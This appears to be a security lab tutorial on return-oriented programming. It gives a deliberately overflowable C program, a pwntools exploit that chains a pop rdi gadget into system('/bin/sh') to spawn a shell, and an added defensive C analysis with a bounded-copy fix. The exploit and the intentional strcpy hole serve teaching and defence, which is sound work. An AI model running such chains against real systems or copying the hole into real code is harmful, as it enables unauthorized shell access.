strangerRidingCaml
6. Return-Oriented Programming (ROP)
Return-Oriented Programming (ROP)
Return-Oriented Programming (ROP) is a technique used in exploitation where existing code snippets, known as gadgets, are chained together to execute arbitrary commands or escalate privileges.
Lab Activity: Return-Oriented Programming (ROP) Attack
In this lab activity, we'll demonstrate a simple ROP attack on a vulnerable C program.
Defender Side Code:
```c
#include <stdio.h>
#include <string.h>

/* Copies attacker-controlled input into a fixed 64-byte stack buffer with no
 * length check: input longer than the buffer overwrites the saved frame
 * pointer and the return address. This is the intended weakness of the lab. */
void vulnerable_function(char *input) {
    char buffer[64];
    strcpy(buffer, input);
}

int main(int argc, char **argv) {
    if (argc != 2) {
        printf("Usage: %s <input>\n", argv[0]);
        return 1;
    }
    vulnerable_function(argv[1]);
    return 0;
}
```
To compile the defender side code:
```sh
gcc -o vulnerable_program vulnerable_program.c
```
Exploit Code (Python using pwntools):
```python
from pwn import *

# Addresses of gadgets in the binary (example values from the author's
# environment; they are specific to that build and libc)
pop_rdi_ret = 0x00400693       # gadget: pop rdi ; ret
system_addr = 0x7ffff7a52390   # address of the system() function in libc
bin_sh_addr = 0x7ffff7b97e9a   # address of the "/bin/sh" string in libc

# Padding to fill the 64-byte buffer and the 8-byte saved rbp, so that the
# next 8 bytes overwrite the saved return address
padding = b"A" * 72

# ROP chain: pop the "/bin/sh" address into rdi, then return into system()
rop_chain = p64(pop_rdi_ret) + p64(bin_sh_addr) + p64(system_addr)

# Payload
payload = padding + rop_chain

# Starting the vulnerable program
p = process("./vulnerable_program")

# Sending the payload on stdin (note: the program as listed above takes its
# input from argv[1], so the delivery path must match the build being used)
p.sendline(payload)

# Interactive shell
p.interactive()
```
The exploit code constructs a ROP chain with gadgets to set up the parameters for the system() function call, including the address of the "/bin/sh" string and the address of the system() function. It then establishes a connection to the vulnerable program, sends the payload, and gains an interactive shell upon successful exploitation.
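To make the frame layout behind the 72-byte padding concrete from the defender's side, here is an added example that is not part of the original post. It assumes the page's target (a 64-byte local buffer followed, on x86-64, by the 8-byte saved rbp and then the saved return address; no stack canary and no reordering of locals) and uses the page's three example addresses only as constructed sample data. It lays a captured payload over that frame geometry, which is what an analyst sees in a crash dump after such an overflow, and shows the bounded copy that should replace the unchecked strcpy. The names safe_copy, view_frame and build_sample_payload are this example's own. Note that the page's compile line passes no hardening flags; the fixed addresses in the exploit only hold for a non-PIE binary with ASLR disabled, and a stack canary (gcc's -fstack-protector) would abort the program before the overwritten return address is used.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Frame geometry assumed from the page's target (x86-64, no canary):
 * 64-byte buffer, then the saved rbp (8 bytes), then the return address.
 * 64 + 8 = 72 is the padding length used by the page's exploit. */
#define BUFFER_SIZE 64
#define SAVED_RBP_SIZE 8
#define WORD_SIZE 8

/* Hardened replacement for vulnerable_function's copy: refuses input that
 * does not fit (including the terminator) instead of writing past the end.
 * Returns 0 on success, -1 when the input would overflow. */
int safe_copy(char *dst, size_t dst_size, const char *src) {
    size_t n = strlen(src);
    if (n >= dst_size) {
        return -1;
    }
    memcpy(dst, src, n + 1);
    return 0;
}

/* Offset at which input bytes start overwriting the saved return address. */
size_t return_address_offset(size_t buffer_size, size_t saved_rbp_size) {
    return buffer_size + saved_rbp_size;
}

/* What the overflow leaves on the stack, read back from the payload. */
struct frame_view {
    uint64_t saved_rbp;
    uint64_t return_address;
    uint64_t stack0;       /* first qword above the return address */
    uint64_t stack1;       /* second qword above the return address */
    size_t   chain_words;  /* 8-byte values from the return address onward */
};

/* Little-endian read of an 8-byte value; bytes past the end read as zero. */
static uint64_t qword_at(const unsigned char *p, size_t len, size_t off) {
    uint64_t v = 0;
    for (size_t i = 0; i < WORD_SIZE; i++) {
        if (off + i < len) v |= (uint64_t)p[off + i] << (8 * i);
    }
    return v;
}

/* Lay a captured payload over the assumed frame. Returns -1 if the payload
 * is too short to reach the return address at all. */
int view_frame(const unsigned char *payload, size_t len, struct frame_view *out) {
    size_t ret_off = return_address_offset(BUFFER_SIZE, SAVED_RBP_SIZE);
    if (len <= ret_off) return -1;
    out->saved_rbp      = qword_at(payload, len, BUFFER_SIZE);
    out->return_address = qword_at(payload, len, ret_off);
    out->stack0         = qword_at(payload, len, ret_off + WORD_SIZE);
    out->stack1         = qword_at(payload, len, ret_off + 2 * WORD_SIZE);
    out->chain_words    = (len - ret_off) / WORD_SIZE;
    return 0;
}

/* Constructed sample: 72 bytes of 'A' followed by the page's three example
 * addresses as little-endian 8-byte values. Returns the payload length. */
size_t build_sample_payload(unsigned char *buf, size_t cap) {
    static const uint64_t chain[] = { 0x00400693ULL, 0x7ffff7b97e9aULL, 0x7ffff7a52390ULL };
    size_t n = 72 + sizeof chain;
    if (cap < n) return 0;
    memset(buf, 'A', 72);
    for (size_t w = 0; w < sizeof chain / sizeof chain[0]; w++)
        for (size_t i = 0; i < WORD_SIZE; i++)
            buf[72 + w * WORD_SIZE + i] = (unsigned char)(chain[w] >> (8 * i));
    return n;
}

int main(void) {
    unsigned char payload[128];
    size_t len = build_sample_payload(payload, sizeof payload);
    struct frame_view fv;
    if (view_frame(payload, len, &fv) == 0) {
        printf("saved rbp      = 0x%016llx\n", (unsigned long long)fv.saved_rbp);
        printf("return address = 0x%016llx\n", (unsigned long long)fv.return_address);
        printf("stack[0]       = 0x%016llx\n", (unsigned long long)fv.stack0);
        printf("stack[1]       = 0x%016llx\n", (unsigned long long)fv.stack1);
    }
    char dst[BUFFER_SIZE];
    char big[100];
    memset(big, 'A', sizeof big - 1);
    big[sizeof big - 1] = '\0';
    printf("safe_copy of 99 bytes into 64: %d\n", safe_copy(dst, sizeof dst, big));
    return 0;
}
```

Running it prints the saved rbp as 0x4141414141414141 (the 'A' bytes), the return address as the page's pop rdi ; ret gadget, and the next two stack slots as the "/bin/sh" and system() addresses, which is exactly the order the ret instructions consume them in; safe_copy returns -1 for the over-long input instead of letting any of that reach the frame.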